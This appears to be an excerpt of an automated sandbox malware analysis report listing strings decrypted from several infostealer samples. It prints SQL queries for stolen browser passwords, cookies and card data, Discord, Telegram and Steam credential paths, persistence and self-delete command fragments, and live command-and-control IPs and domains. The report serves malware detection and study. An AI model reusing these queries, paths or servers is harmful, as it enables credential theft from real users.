Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: C:\ProgramData\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: browser:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: profile:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: url:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: login:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: password:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Opera
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: OperaGX
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Network
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: cookies
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: .txt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: TRUE
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: FALSE
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: autofill
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: history
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: name:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: month:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: year:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: card:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Cookies
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Login Data
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Web Data
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: History
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: logins.json
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: formSubmitURL
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: usernameField
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: encryptedUsername
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: encryptedPassword
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: guid
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: cookies.sqlite
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: formhistory.sqlite
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: places.sqlite
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: plugins
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Local Extension Settings
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Sync Extension Settings
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: IndexedDB
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Opera Stable
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Opera GX Stable
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CURRENT
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: chrome-extension_
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Local State
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: profiles.ini
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: chrome
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: opera
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: firefox
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: wallets
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %08lX%04lX%lu
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ProductName
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ProcessorNameString
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DisplayName
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DisplayVersion
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Network Info:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - IP: IP?
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Country: ISO?
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: System Summary:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - HWID:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - OS:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Architecture:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - UserName:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Computer Name:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Local Time:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - UTC:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Language:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Keyboards:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Laptop:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Running Path:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - CPU:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Threads:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Cores:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - RAM:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Display Resolution:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - GPU:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: User Agents:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Installed Apps:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: All Users:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Current User:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Process List:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: system_info.txt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: freebl3.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: mozglue.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: msvcp140.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: nss3.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: softokn3.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: vcruntime140.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Temp\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: .exe
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: runas
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: open
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: /c start
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %DESKTOP%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %APPDATA%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %USERPROFILE%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %DOCUMENTS%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %PROGRAMFILES%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %RECENT%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: *.lnk
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: files
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \discord\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Local Storage\leveldb
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Telegram Desktop\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: key_datas
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: map*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: F8806DD0C461824F*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Telegram
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: *.tox
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: *.ini
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Password
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: 00000001
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: 00000002
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: 00000003
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: 00000004
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Pidgin
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \.purple\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: accounts.xml
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: token:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Software\Valve\Steam
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SteamPath
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \config\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ssfn*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: config.vdf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DialogConfig.vdf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: libraryfolders.vdf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: loginusers.vdf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Steam\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: browsers
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: done
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: soft
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Discord\tokens.txt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: https
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: POST
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HTTP/1.1
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: hwid
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: build
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: token
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: file_name
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: file
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: message
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: screenshot.jpg
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: 185.172.128.19
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /ghsdh39s/index.php
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: S-%lu-
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: cd1f156d67
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Utsysc.exe
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SCHTASKS
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /Create /SC MINUTE /MO 1 /TN
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /TR "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Startup
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: cmd /C RMDIR /s/q
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: rundll32
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /Delete /TN "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Programs
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: %USERPROFILE%
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: cred.dll|clip.dll|
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: http://
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: https://
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /Plugins/
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: &unit=
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: shell32.dll
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: kernel32.dll
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: GetNativeSystemInfo
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: ProgramData\
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: AVAST Software
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Kaspersky Lab
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Panda Security
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Doctor Web
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: 360TotalSecurity
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Bitdefender
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Norton
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Sophos
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Comodo
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: WinDefender
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: 0123456789
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: ------
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: ?scr=1
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: ComputerName
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: -unicode-
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: VideoID
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: DefaultSettings.XResolution
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: DefaultSettings.YResolution
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: ProductName
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: CurrentBuild
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: echo Y|CACLS "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: " /P "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: CACLS "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: :R" /E
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: :F" /E
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: &&Exit
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: rundll32.exe
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: "taskkill /f /im "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: " && timeout 1 && del
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: && Exit"
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: " && ren
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Powershell.exe
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: shutdown -s -t 0
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /w']fC
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: vw(hF=
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: pillowbrocccolipe.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: communicationgenerwo.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: diskretainvigorousiw.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: affordcharmcropwo.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: dismissalcylinderhostw.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: enthusiasimtitleow.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: worryfillvolcawoi.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: cleartotalfisherwo.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: affordcharmcropwo.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: TeslaBrowser/5.5
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: - Screen Resoluton:
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: - Physical Installed Memory:
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: Workgroup: -
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: LGNDR1--ketamine
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008A3EB0 CryptUnprotectData,CryptUnprotectData, 9_2_008A3EB0

Exploits

Source: Yara match File source: 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file300un.exe PID: 7556, type: MEMORYSTR
Source: 1CMweaqlKp.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: freebl3.pdb source: freebl3[1].dll.51.dr
Source: Binary string: C:\wutimosolix_62\gowaj\tosusinana-la.pdb source: ISetup8.exe, 00000029.00000003.2151074345.0000000003871000.00000004.00000020.00020000.00000000.sdmp, u6po.0.exe, 00000033.00000000.2149099984.0000000000412000.00000002.00000001.01000000.0000001F.sdmp
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.51.dr
Source: Binary string: C:\somilixucasoba_pi.pdb source: ISetup8.exe, 00000029.00000000.2055258369.0000000000412000.00000002.00000001.01000000.00000019.sdmp, rVg8HtIzXa4xhJHL7Pn8A6d2.exe.54.dr
Source: Binary string: file300un.PDBI: source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\rute\dazazef.pdb source: toolspub1.exe, 00000031.00000000.2109256617.0000000000412000.00000002.00000001.01000000.0000001D.sdmp, toolspub1.exe, 00000031.00000002.2197395229.0000000000412000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: mscorlib.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: C:\dimohisek.pdb source: ppcQqLgPI8Dyy7YykX33fm5x.exe.54.dr
Source: Binary string: Croco.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\1000075001\file300un.PDB source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: YC:\rute\dazazef.pdb source: toolspub1.exe, 00000031.00000000.2109256617.0000000000412000.00000002.00000001.01000000.0000001D.sdmp, toolspub1.exe, 00000031.00000002.2197395229.0000000000412000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: mscorlib.ni.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: ,C:\dimohisek.pdb source: ppcQqLgPI8Dyy7YykX33fm5x.exe.54.dr
Source: Binary string: pC:\Users\user\AppData\Local\Temp\1000075001\file300un.PDB source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdb4 source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: GC:\somilixucasoba_pi.pdb source: ISetup8.exe, 00000029.00000000.2055258369.0000000000412000.00000002.00000001.01000000.00000019.sdmp, rVg8HtIzXa4xhJHL7Pn8A6d2.exe.54.dr
Source: Binary string: System.ni.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.ni.pdb source: WERA6A7.tmp.dmp.34.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: number of queries: 1081
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008A33B0 FindFirstFileA,FindNextFileA, 9_2_008A33B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008C3B20 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 9_2_008C3B20
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00811F8C FindFirstFileExW, 9_2_00811F8C
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData\Local

Networking

Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
Source: Malware configuration extractor URLs: pillowbrocccolipe.shop
Source: Malware configuration extractor URLs: communicationgenerwo.shop
Source: Malware configuration extractor URLs: diskretainvigorousiw.shop
Source: Malware configuration extractor URLs: affordcharmcropwo.shop
Source: Malware configuration extractor URLs: dismissalcylinderhostw.shop
Source: Malware configuration extractor URLs: enthusiasimtitleow.shop
Source: Malware configuration extractor URLs: worryfillvolcawoi.shop
Source: Malware configuration extractor URLs: cleartotalfisherwo.shop
Source: Malware configuration extractor URLs: affordcharmcropwo.shop
Source: Malware configuration extractor URLs: http://185.172.128.150/c698e1bc8a2f5e6d.php
Source: Malware configuration extractor URLs: http://trad-einmyus.com/index.php
Source: Malware configuration extractor URLs: http://tradein-myus.com/index.php
Source: Malware configuration extractor URLs: http://trade-inmyus.com/index.php
Source: Malware configuration extractor IPs: 185.172.128.19
Source: Malware configuration extractor URLs: 185.215.113.67:26260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: EubzUqqfLmBbNiHWxubQa6s2.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: dq1f6mXIBjMzMXMQVeg2fNsL.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: MTc4G09Eq4noHZ0G091uBZf1.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: 5aIar1h6imWjPJZYPL4QSqoe.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: r5kIpAOOvnafOvgnH4OtxIFK.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: s0yoB0FX6GRQugk063ujbi4o.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: EUl5mGPccm3Ux8yn4fNnNA26.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: AN3CiEs9vHs3cPsEPcJxdtOY.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: K7e4fpNGO8JkAsFxVXguIAcd.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: qhzSo7WKfB79QVVeIp5fAbeL.exe.54.dr
Source: Yara match File source: 50.2.file300un.exe.1f3800d4830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 50.2.file300un.exe.1f3800d7298.0.raw.unpack, type: UNPACKEDPE
Source: Joe Sandbox View IP Address: 193.233.132.139 193.233.132.139
Source: Joe Sandbox View IP Address: 185.172.128.90 185.172.128.90
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008A52A0 recv, 9_2_008A52A0
Source: d361f35322.exe, 00000024.00000003.2820817674.0000000001443000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: in?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: d361f35322.exe, 00000024.00000003.2820817674.0000000001443000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: in?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/v/ equals www.youtube.com (Youtube)
